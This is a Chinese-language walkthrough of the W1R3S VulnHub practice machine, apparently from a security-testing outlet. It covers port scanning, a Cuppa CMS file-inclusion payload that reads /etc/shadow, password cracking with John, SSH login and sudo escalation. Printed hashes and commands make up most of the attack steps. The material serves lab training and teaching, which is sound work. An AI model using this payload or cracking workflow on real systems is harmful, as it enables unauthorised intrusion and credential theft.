服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

靶机练习-W1R3S

日期: 来源:雷神众测收集编辑:s1mp1e

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

靶机简介

Name: W1R3S: 1.0.1
Difficulty:Beginner/Intermediate
Flag : 1 Flag located in /root directory
靶机下载地址:https://www.vulnhub.com/entry/w1r3s-101,220/

实验环境

攻击机:kali(192.168.11.166)
靶机:Linux,IP自动获取
攻击机与靶机都使用net网络连接,在同一网段下


渗透测试步骤

1、使用nmap扫描网段,获得靶机IP

sudo nmap -sn 192.168.11.0/24

2、使用masscan扫描目标端口

sudo masscan -p1-65535 --rate=10000 192.168.11.165

3、对开放的端口进行探测

sudo nmap -sT -sV -O -p 21,22,80,3306 192.168.11.165

可以看到目标有http、mysql、ftp、ssh等服务,Linux系统。

4、先从http服务入手,访问80端口,发现是一个apache的默认页面

5、扫描目录

sudo dirsearch -u http://192.168.11.165/

发现有一个administrator路径、wordpress、installation这些

6、首先看一下wordpress,发现是一个登录的,输入账号密码尝试一下跳转到一个错误页面,暂时不考虑

7、接着看administrator路径,发现是安装页面,同时发现使用了Cuppa CMS

碰到安装页面不建议进一步攻击,万一真给目标重装了后果是很严重的。所以接下来的思路是找Cuppa CMS漏洞

8、使用searchsploit搜索漏洞

searchsploit Cuppa

searchsploit -m 25971

发现是一个文件包含漏洞,查看25971.txt文档,看如何利用

9、拼接漏洞路径访问,确定路径为:

http://192.168.11.165/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

但是没有返回结果,尝试了编码、另一种攻击语句,都没有响应内容,最后发现这玩意有问题,不是get请求的参数,而是post请求的参数

10、发现可以成功读取shadow文件

获得如下几个密文:

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

11、使用John破解shadow文件中的密文,将上面获得的密文保存为hash.txt

john hash.txt --wordlist /usr/share/john/password.lst

成功破解出 w1r3s 用户的密码为 computer

12、目标开放了22端口,尝试使用ssh远程连接

ssh w1r3s@192.168.11.165

13、提权

sudo -l

发现当前用户可以sudo任何命令,直接sudo su提权到root

14、获得flag
在/root目录下获得flag

总结

该靶场的难点在于对Cuppa CMS漏洞的利用,需要自己拼接漏洞路径,要多尝试几次,得到/etc/shadow文件内容之后,对密码进行破解,获得了w1r3s用户的密码,ssh远程连接后,提权的方法比较常规也比较简单。


安恒信息

杭州亚运会网络安全服务官方合作伙伴

成都大运会网络信息安全类官方赞助商

武汉军运会、北京一带一路峰会

青岛上合峰会、上海进博会

厦门金砖峰会、G20杭州峰会

支撑单位北京奥运会等近百场国家级

重大活动网络安保支撑单位

END

长按识别二维码关注我们


相关阅读

  • 雷神众测漏洞周报2023.02.13-2023.02.19

  • 以下内容,均摘自于互联网,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,雷神众测以及文章作者不承担任何责任。雷神众测拥有该文章的修
  • Atlassian JIRA Velocity模板注入漏洞分析

  • 更多安全资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn)近两年Atlassian
    JIRA爆出几个SSTI(服务器端模板注入)漏洞,漏洞编号分别为CVE-2019-11
  • ThinkPHP多语言文件包含漏洞分析

  • 更多安全资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn)一、漏洞概述 ThinkPHP是一个开源轻量级PHP框架,其6.0.13及以前版本存在一个文件包
  • ADLab 2022年安全研究回顾

  • 2022年,启明星辰ADLab研究方向重点包括攻防技术安全研究、黑客攻击与威胁研究、主流操作系统及应用安全研究、Web安全研究、云安全研究、智能终端安全研究、工控物联网安全研
  • Android App半自动化静态漏洞挖掘技术分析

  • 更多安全资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn)目 录一、前言二、Android App漏洞扫描的难点三、个人扫描器和商业化漏洞扫描器的
  • 一周网安知识汇总 | 2023.02.01-2023.02.07

  • 一周网安知识汇总雷石安全实验室【2023.02.01-2023.02.07】本栏目内容由雷石安全实验室整理,主要分享国内外优秀文章和github优秀项目。微信链接可直接点击,外部链接需要复制

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 靶机练习-W1R3S

  • 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如
  • 雷神众测漏洞周报2023.02.13-2023.02.19

  • 以下内容,均摘自于互联网,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,雷神众测以及文章作者不承担任何责任。雷神众测拥有该文章的修
  • 强者姿态

  • #每一篇文章,认真读才会更有收获#有同学想让谈一谈自我怀疑,是的,确实是有这么一位“同学”——就算没有,放心...我也会无中生“有”的,主要是今天我就想谈这个话题。那么,你是否
  • 害怕努力却没有好结果,怎么办?

  • #每一篇文章,认真读才会更有收获#有个姑娘名字叫做小芳,大家都知道小芳长得好看又善良,还有一双美丽的大眼睛,辫子粗又长。这些,你们都知道……但是,只有我知道,小芳她还有隐秘的心